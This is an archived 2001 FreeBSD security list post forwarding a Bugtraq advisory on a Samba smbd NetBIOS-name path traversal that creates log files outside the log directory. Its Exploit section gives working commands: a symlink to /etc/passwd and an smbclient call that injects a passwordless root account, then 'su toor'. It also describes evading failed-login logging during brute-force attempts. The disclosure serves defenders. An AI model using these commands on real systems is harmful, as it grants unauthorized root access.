Date: Sun, 24 Jun 2001 09:42:04 -0700 From: Cy Schubert - ITSD Open Systems Group <Cy.Schubert@uumail.gov.bc.ca> To: security-officer@freebsd.org, dwcjr@freebsd.org Cc: freebsd-security@freebsd.org Subject: smbd remote file creation vulnerability (fwd) Message-ID: <200106241642.f5OGgOx31237@cwsys.cwsent.com>
next in thread | raw e-mail | index | archive | help
Just received this from BUGTRAQ...
Security-officer & dwcjr, this is just a heads up that a Samba patch is
coming down the pipe RSN.
freebsd-security mailing list users using Samba, FYI.
Regards, Phone: (250)387-8437
Cy Schubert Fax: (250)387-5766
Team Leader, Sun/Alpha Team Internet: Cy.Schubert@osg.gov.bc.ca
Open Systems Group, ITSD, ISTA
Province of BC
------- Forwarded Message
[headers removed]
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 3454 invoked from network); 24 Jun 2001 04:25:44 -0000
X-Authentication-Warning: nimue.bos.bindview.com: lcamtuf owned process
doing -bs
Date: Sat, 23 Jun 2001 23:24:26 -0400 (EDT)
From: Michal Zalewski <lcamtuf@bos.bindview.com>
To: bugtraq@securityfocus.com
Subject: smbd remote file creation vulnerability
Message-ID: <Pine.LNX.4.21.0106232315510.10682-100000@nimue.bos.bindview
.com>
X-Nmymbofr: Nir Orb Buk
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
** Please hold with approving this one before Monday, if possible.
** This is a forced release.
Author: Michal Zalewski <lcamtuf@razor.bindview.com>
Topic:
Insufficient parameter validation and unsafe default configuration
make numerous systems running samba SMB file sharing daemon
vulnerable
to remote attacks.
Vulnerable platforms:
Tested on smbd 2.0.7 shipped with RedHat Linux 7.0 and 7.1. Confirmed
on 2.0.8.
Overview:
Due to insufficient NetBIOS computer name validation in incoming SMB
requests, in conjunction with default configuration found for example
in RedHat Linux and derivates, samba daemon allows remote attackers
to create SMB session log files (*.log) with highly
attacker-dependent
contents outside outside logs directory. This vulnerability itself
can
be used to perform DoS attacks, or, if combined with unprivileged
local
access, can be used to gain superuser privileges.
On vulnerable platforms, by default, each SMB session is logged
to the file /var/log/samba/<netbios-name>.log. If the attacker is
connecting from 'FOOBAR', logs would be put in /var/log/foobar.log.
Unfortunately, NetBIOS name '../../../evil' would be accepted, as
well,
creating /evil.log file.
This vulnerability is exploitable if the following setting is present
in smb.conf file:
log file = /var/log/samba/%m.log
...which is default on major Linux distributions, and probably few
other platforms, as well. On some systems, configuration might be
different:
log file = /usr/local/samba/var/log.%m
In the second case (e.g. FreeBSD), there is usually no way to exploit
this vulnerability.
Additionally, as noticed by Mark Loveless, using specific NetBIOS
names, like 'non/existing/dir', it is possible to avoid logging
of error messages (e.g. authentication failures) at all, which might
be
very useful for performing brute-force attacks.
Note that any non-default configuration not using any prefix or
suffix (log- or .log) in log filename would be vulnerable to
instant remote compromise.
Exploit:
This is the scenario of local privilege escalation attack against
RedHat 7.x installation:
$ ln -s /etc/passwd /tmp/x.log
$ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`"
\
-n ../../../tmp/x -N
...where 'NIMUE' stands for local host name (few error messages
should be returned).
$ su toor
#
Explaination of this attack is pretty trivial. Samba daemon tries
to access logfile for host introducing itself as '../../../tmp/x'.
This translates to open() on /var/log/samba/../../../tmp/x.log.
Thus, /tmp/x.log is opened in O_APPEND mode, following previously
created symlink to /etc/passwd.
Then, anonymous attempt to mount non-existing share named
"\ntoor::0:0::/:/bin/sh\n" is logged in /tmp/x.log, or, if you
prefer, in /etc/passwd. Error message looks this way:
[2001/06/22 14:53:03, 1] smbd/reply.c:reply_sesssetup_and_X(925)
Rejecting user 'lcamtuf': authentication failed
[2001/06/22 14:53:03, 0] smbd/service.c:make_connection(214)
../../../tmp/x (192.233.133.108) couldn't find service
toor::0:0::/:/bin/sh
The last line is, obviously, accepted by /bin/su or /bin/login.
Fix information:
As a temporary workaround, we suggest changing 'log file' setting,
as described above. This vulnerability has been confirmed by the
vendor, and is addressed there:
http://us1.samba.org/samba/whatsnew/macroexploit.html
Removing '%m' at all would protect against attackers trying to avoid
logging at all. Vendor was informed, fix will be publicly available
soon.
------- End of Forwarded Message
To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200106241642.f5OGgOx31237>